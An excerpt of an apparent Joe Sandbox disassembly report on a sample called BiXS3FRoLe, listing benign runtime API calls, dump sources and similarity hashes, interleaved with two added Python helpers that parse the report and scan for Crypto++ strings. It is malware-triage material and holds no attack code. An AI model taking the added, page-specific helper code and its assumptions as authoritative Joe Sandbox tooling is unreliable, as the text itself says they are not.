                                                                                                        • Instruction ID: 051181ac0c087e12c7bbcc8ade92ac89ca562b95731d2f2e9694cad014fc29a7
                                                                                                        • Opcode Fuzzy Hash: 849e559f40c5503dd2cf8234869c9f33ccc5003824a343041ac3e7eabce03773
                                                                                                        • Instruction Fuzzy Hash: 29014F35600610DBCB05AF64FD9CAA57BE9FB0A74274440AAE802A7370CF746D14CB94
                                                                                                        APIs
                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00B0D30E
                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00B0D31E
                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00B0D32E
                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00B0D342
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Compare_exchange_acquire_4std::_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3973403980-0
                                                                                                        • Opcode ID: c3e98d520ee154351f5eab327fd590a9931b1f5e0108a4d6b1addf49a0b8f4a6
                                                                                                        • Instruction ID: 74950a3cda7115a5c0859b52a6435be8141ced475716bef8c83610f05d4c03f5
                                                                                                        • Opcode Fuzzy Hash: c3e98d520ee154351f5eab327fd590a9931b1f5e0108a4d6b1addf49a0b8f4a6
                                                                                                        • Instruction Fuzzy Hash: AA016432400109ABCF129ED4ED829AD3FA2FB19310B048091FD28850F0DB32DA70EB86
                                                                                                        APIs
                                                                                                        • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00B0D355
                                                                                                          • Part of subcall function 00B01F1F: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00B08146
                                                                                                        • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 00B0D379
                                                                                                        • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00B0D38C
                                                                                                        • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00B0D395
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                                                                                                        • String ID:
                                                                                                        • API String ID: 218105897-0
                                                                                                        • Opcode ID: 1ab730b203937651ef122450f71a0a107b40cf19d47cea0b01753b3323a43e2d
                                                                                                        • Instruction ID: 165543a5ef5f7b7da7179c0114a4bf11ecb9443dc53384d1d068e4040cff2cc2
                                                                                                        • Opcode Fuzzy Hash: 1ab730b203937651ef122450f71a0a107b40cf19d47cea0b01753b3323a43e2d
                                                                                                        • Instruction Fuzzy Hash: 45F0A030200B108EE630AA689811F6A7BD9CF44310F40C899F41A8B2C2CB24E943CB46
                                                                                                        APIs
                                                                                                        • RegisterWaitForSingleObject.KERNEL32(00B0896E,00B14A42,75EC5D89,00B14B42,000000FF,0000000C), ref: 00B029C4
                                                                                                        • GetLastError.KERNEL32(?,00B14B42,75EC5D89,00B14A42,00B0896E,?,?,?,?,00B0896E,?,?,?,?,00000000), ref: 00B029D3
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B029E9
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B029F7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3803302727-0
                                                                                                        • Opcode ID: 58970478a8ae7f5ce155617712807a9f02350e8834d8cd4f3040b75d324051ff
                                                                                                        • Instruction ID: c475a27e44ca4e3337685fce9cc780d57d155051b62d60b395aa8d7d3cdfa625
                                                                                                        • Opcode Fuzzy Hash: 58970478a8ae7f5ce155617712807a9f02350e8834d8cd4f3040b75d324051ff
                                                                                                        • Instruction Fuzzy Hash: 10F08C3160020ABBCF00EFA08D0AFEF7BFCAB04745F500190B911E60E1DA34DA189BA0
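The records above are Joe Sandbox's per-function summaries of the unpacked image at 00A70000: the API call sites each function contains (entries marked "Part of subcall function" sit in a callee, not in the function itself), the memory dump the code was lifted from, and the Similarity hashes (Opcode ID, Instruction ID and their fuzzy variants) that let a function be matched across samples. To use them outside the web UI they have to be pulled out of the text first. The parser below is an added example written for this page, not Joe Sandbox tooling; it reads this report layout (APIs / Memory Dump Source / Joe Sandbox IDA Plugin / Similarity) into records, separates a function's own API calls from subcall entries, strips the "Download File" link residue from the Associated lines, and matches functions between two reports by Opcode ID. SAMPLE_A is a trimmed copy of two records above; SAMPLE_B is a constructed second report, and treating an equal Opcode ID as "same function code" is an assumption of the example, not a documented Joe Sandbox guarantee.

```python
"""Parse the per-function records of a Joe Sandbox disassembly report.

Added example, not Joe Sandbox tooling. It reads the plain-text layout
(APIs / Memory Dump Source / Joe Sandbox IDA Plugin / Similarity) into
records so functions can be matched across reports by their Opcode ID.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall function X:"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")
SECTIONS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiRef:
    name: str
    module: str
    ref: str                   # address of the call site
    args: List[str]
    subcall_of: Optional[str]  # callee address when the call is inside a subfunction


@dataclass
class FunctionRecord:
    apis: List[ApiRef] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)   # Similarity / dump fields
    associated: List[str] = field(default_factory=list)    # associated .sdmp dumps


def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":          # every record opens with its APIs section
            records.append(FunctionRecord())
            section = "APIs"
        elif line in SECTIONS:
            section = line
        elif records and section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a for a in (m.group("args") or "").split(",") if a]
                records[-1].apis.append(ApiRef(m.group("name"), m.group("module"),
                                               m.group("ref"), args, m.group("sub")))
        elif records and (m := FIELD_RE.match(line)):
            key, val = m.group("key"), m.group("val")
            if key == "Associated":   # drop the "Download File" link residue
                records[-1].associated.append(val.replace("Download File", "").strip())
            else:
                records[-1].fields[key] = val
    return records


def direct_api_names(rec: FunctionRecord) -> List[str]:
    """APIs the function calls itself; subcall entries belong to its callees."""
    return [a.name for a in rec.apis if a.subcall_of is None]


def functions_calling(records: List[FunctionRecord], api: str) -> List[str]:
    """Opcode IDs of the records whose own code references the given API."""
    return [r.fields.get("Opcode ID", "") for r in records if api in direct_api_names(r)]


def shared_functions(a: List[FunctionRecord], b: List[FunctionRecord]) -> List[str]:
    """Opcode IDs present in both reports (assumed here to mean identical function code)."""
    ids_b = {r.fields.get("Opcode ID") for r in b}
    return sorted(i for i in (r.fields.get("Opcode ID") for r in a) if i and i in ids_b)


# Trimmed copy of two records from this report (the CriticalSection and ReleaseSemaphore functions).
SAMPLE_A = """
APIs
• EnterCriticalSection.KERNEL32(00B987E8,?,?,00AD48EF,00B97168,00B51FF0,00000001), ref: 00B0075A
• LeaveCriticalSection.KERNEL32(00B987E8,?,00AD48EF,00B97168,00B51FF0,00000001), ref: 00B0078D
• SetEvent.KERNEL32(00000000,00B97168,00B51FF0,00000001), ref: 00B0081B
• ResetEvent.KERNEL32 ref: 00B00827
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: CriticalEventSection$EnterLeaveReset
• Opcode ID: 849e559f40c5503dd2cf8234869c9f33ccc5003824a343041ac3e7eabce03773
• Instruction Fuzzy Hash: 29014F35600610DBCB05AF64FD9CAA57BE9FB0A74274440AAE802A7370CF746D14CB94
APIs
  • Part of subcall function 00AFFCB0: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,AE695AF0), ref: 00AFFCF5
• ReleaseSemaphore.KERNEL32(?,?,00000000,?,00AFFD89), ref: 00B000C1
• CloseHandle.KERNEL32(?,?,AE695AF0,AE695AF0), ref: 00B000F2
Similarity
• API ID: ReleaseSemaphore$CloseEventHandleObjectSingleWait
• Opcode ID: c70e8e0570af623b87c7afd93f91026f60e82170cef1b80e0c1a436e85bbe739
"""

# Constructed second report: one record shares an Opcode ID with SAMPLE_A, one is a made-up hash.
SAMPLE_B = """
APIs
Similarity
• Opcode ID: 849e559f40c5503dd2cf8234869c9f33ccc5003824a343041ac3e7eabce03773
APIs
Similarity
• Opcode ID: 1111111111111111111111111111111111111111111111111111111111111111
"""
```

Running shared_functions(parse_records(SAMPLE_A), parse_records(SAMPLE_B)) returns only the CriticalSection function's Opcode ID, and functions_calling(..., "WaitForSingleObjectEx") returns nothing for SAMPLE_A because that call is a subcall entry of 00AFFCB0, not code of the function being described; keeping that distinction matters when an API list is turned into a behavioural signature.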
                                                                                                        APIs
                                                                                                        • ___crtCreateEventExW.LIBCPMT ref: 00B026E8
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00B01F19), ref: 00B026F6
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B0270C
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B0271A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                        • String ID:
                                                                                                        • API String ID: 200240550-0
                                                                                                        • Opcode ID: e9c8e3f98206a71caa66539c87894ece7f2c97685baa2bd290ea84ef4e26c6fc
                                                                                                        • Instruction ID: 6934930b8a2426609fecf10a7bdd61838ab016d4cebcca6a84826a467ec512fe
                                                                                                        • Opcode Fuzzy Hash: e9c8e3f98206a71caa66539c87894ece7f2c97685baa2bd290ea84ef4e26c6fc
                                                                                                        • Instruction Fuzzy Hash: F8E0DF6264031A2AEB50B3768C0BFBB3AEC9B00B44F8408D0BA24E50D3FE64D90842A5
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B02AAE: TlsAlloc.KERNEL32(?,00B01F19), ref: 00B02AB4
                                                                                                        • TlsAlloc.KERNEL32(?,00B01F19), ref: 00B14E57
                                                                                                        • GetLastError.KERNEL32 ref: 00B14E69
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B14E7F
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B14E8D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3735082963-0
                                                                                                        • Opcode ID: 8d9c500e999dddacb6ace5498c74ac809eb892586536297d71763a6a83d50dcb
                                                                                                        • Instruction ID: 218121856ca73d398cd94047f04ffa70f00da6e14cba928e21981ff1c857f0bd
                                                                                                        • Opcode Fuzzy Hash: 8d9c500e999dddacb6ace5498c74ac809eb892586536297d71763a6a83d50dcb
                                                                                                        • Instruction Fuzzy Hash: 21E0D8715003056ACB14BB749D4E6FF37F8BA01755B900ED5B522E71F2EF34C48886A0
                                                                                                        APIs
                                                                                                        • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00B01F19), ref: 00B028F3
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00B01F19), ref: 00B02902
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B02918
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B02926
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3016159387-0
                                                                                                        • Opcode ID: 3d56fc90425ba62c55963850ba41568ba9ef012431f7ef97d67ac8af9a437b98
                                                                                                        • Instruction ID: c4c8f48aa83cc04920a7fc001dc14884745a4c41bb98606c3e95abf987550c56
                                                                                                        • Opcode Fuzzy Hash: 3d56fc90425ba62c55963850ba41568ba9ef012431f7ef97d67ac8af9a437b98
                                                                                                        • Instruction Fuzzy Hash: EBE01A70A0024AAACB00EBB59E4AAEB77FCAA00745F5004E4A541E61A1EE24DA0887A4
                                                                                                        APIs
                                                                                                        • TlsAlloc.KERNEL32(?,00B01F19), ref: 00B02AB4
                                                                                                        • GetLastError.KERNEL32 ref: 00B02AC1
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B02AD7
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B02AE5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3103352999-0
                                                                                                        • Opcode ID: 1411c803d8c71d17d5e5b2d0ef8192a624bf7005c42e841e906cc601b65e11d2
                                                                                                        • Instruction ID: a8b4cef97aa7af62501a562ea65176218bccf1b8732d25280dfe5f35d4733481
                                                                                                        • Opcode Fuzzy Hash: 1411c803d8c71d17d5e5b2d0ef8192a624bf7005c42e841e906cc601b65e11d2
                                                                                                        • Instruction Fuzzy Hash: A5E0C23060020966CB10B7748C1EBFF36ECEA00755BA00AD0F925D21F2EE64D8584AA4
                                                                                                        APIs
                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00B2C91D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorHandling__start
                                                                                                        • String ID: pow
                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                        • Opcode ID: 432e15333bd536871fcf6ed224cd5b5e1726ac604e4557ef7c32ad3581b0a5e3
                                                                                                        • Instruction ID: ba7a1baed8f2f60ef4681ad4ebecc247ec9aede95b02b9ba3e66f0164fd44ed4
                                                                                                        • Opcode Fuzzy Hash: 432e15333bd536871fcf6ed224cd5b5e1726ac604e4557ef7c32ad3581b0a5e3
                                                                                                        • Instruction Fuzzy Hash: 79515B61A1420586CB16BB18ED8137E3FE4DB40B50F308AD9F0D9462E9EB358CC19A87
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ABC59D
                                                                                                        Strings
                                                                                                        • BlockPaddingScheme, xrefs: 00ABC52D
                                                                                                        • StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher, xrefs: 00ABC577
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: BlockPaddingScheme$StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher
                                                                                                        • API String ID: 2005118841-3582606076
                                                                                                        • Opcode ID: 0332f1f3497645d80e92f731b6b3e8c65d2e0774d3cff444804a67957b492e9f
                                                                                                        • Instruction ID: 26531b32b15488f5c1b79c2554faf2eff2b371f0ed5a3aac9a0575c04e79a0f3
                                                                                                        • Opcode Fuzzy Hash: 0332f1f3497645d80e92f731b6b3e8c65d2e0774d3cff444804a67957b492e9f
                                                                                                        • Instruction Fuzzy Hash: 0451C0B1A00749AFCB24DF64C955BDEBBF8FF05714F10419AE801AB392D7B1A908CB90
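The two strings in this record are Crypto++ strings: the long one is the error text of the StreamTransformationFilter constructor and "BlockPaddingScheme" is the name of a Crypto++ algorithm parameter. Their presence in the memory dump is the usual sign that the sample statically links Crypto++, and the same strings are a cheap triage check for other samples from the same builder. The Python below is an added helper written for this edit, not code from the Joe Sandbox report or from Joe Security; it searches a raw PE or a downloaded .sdmp for those two strings and reports where they sit. The blob it scans by default is constructed for the demonstration and is not data from BiXS3FRoLe.exe; the optional second command-line argument, the image base in hex, is an assumption of this helper.

```python
"""Fingerprint a statically linked Crypto++ in a raw PE or memory dump.

Added triage helper, not part of the Joe Sandbox report. It only searches for
the two Crypto++ strings the report lists for this function; the demo blob
below is constructed for the demonstration and is not data from the sample.
"""
import sys
from typing import Dict, List, Tuple

# Strings the report shows at xrefs 00ABC52D and 00ABC577. Both belong to
# Crypto++: the long one is the StreamTransformationFilter constructor's
# error text, the short one is the BlockPaddingScheme parameter name.
CRYPTOPP_MARKERS: Dict[str, bytes] = {
    "StreamTransformationFilter ctor":
        b"StreamTransformationFilter: please use AuthenticatedEncryptionFilter "
        b"and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher",
    "BlockPaddingScheme": b"BlockPaddingScheme",
}


def find_markers(data: bytes,
                 markers: Dict[str, bytes] = CRYPTOPP_MARKERS) -> List[Tuple[str, int]]:
    """Return (label, offset) for every occurrence of every marker.

    Plain byte search rather than a regex: the messages contain no wildcards
    and bytes.find() avoids having to escape them.
    """
    hits: List[Tuple[str, int]] = []
    for label, needle in markers.items():
        pos = data.find(needle)
        while pos != -1:
            hits.append((label, pos))
            pos = data.find(needle, pos + 1)
    return sorted(hits, key=lambda h: h[1])


def fingerprint(data: bytes, image_base: int = 0) -> dict:
    """Summarise the scan. image_base turns dump offsets into virtual
    addresses; the record above gives Offset: 00A70000 for this module."""
    hits = find_markers(data)
    return {
        "cryptopp": bool(hits),
        "hits": [(label, image_base + off) for label, off in hits],
    }


# Constructed demo input: padding, both markers NUL-terminated, more padding.
# This is NOT a slice of BiXS3FRoLe.exe.
DEMO_BLOB = (
    b"\x00" * 32
    + b"BlockPaddingScheme\x00"
    + b"\x90" * 64
    + CRYPTOPP_MARKERS["StreamTransformationFilter ctor"] + b"\x00"
    + b"\x00" * 32
)


def main(argv: List[str]) -> int:
    # Assumed CLI: <file> [image_base_hex]; with no arguments scan the demo blob.
    if len(argv) > 1:
        with open(argv[1], "rb") as fh:
            data = fh.read()
        base = int(argv[2], 16) if len(argv) > 2 else 0
    else:
        data, base = DEMO_BLOB, 0
    result = fingerprint(data, base)
    print("Crypto++ strings present" if result["cryptopp"] else "no Crypto++ markers")
    for label, va in result["hits"]:
        print(f"  {va:#010x}  {label}")
    return 0 if result["cryptopp"] else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it against the downloaded Source File dump with the module's load address as the second argument so the hits print as virtual addresses; a clean result on a dump that the report says contains these strings means the region you downloaded is not the one the strings live in, not that Crypto++ is absent.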
                                                                                                        APIs
                                                                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00B1A99A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EncodePointer
                                                                                                        • String ID: MOC$RCC
                                                                                                        • API String ID: 2118026453-2084237596
                                                                                                        • Opcode ID: 548cecea7ce40b4afde949bb929ce25608178f9cfd0ed76a2e1fb3657fca4d08
                                                                                                        • Instruction ID: 2cbeac05e034ceebddaa69a1b9eab55294548ce391f4282060c5702ef492921b
                                                                                                        • Opcode Fuzzy Hash: 548cecea7ce40b4afde949bb929ce25608178f9cfd0ed76a2e1fb3657fca4d08
                                                                                                        • Instruction Fuzzy Hash: 62413771901209AFCF15DF98C981AEEBBF5FF48300F598099F908A7251E335A990DB92
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
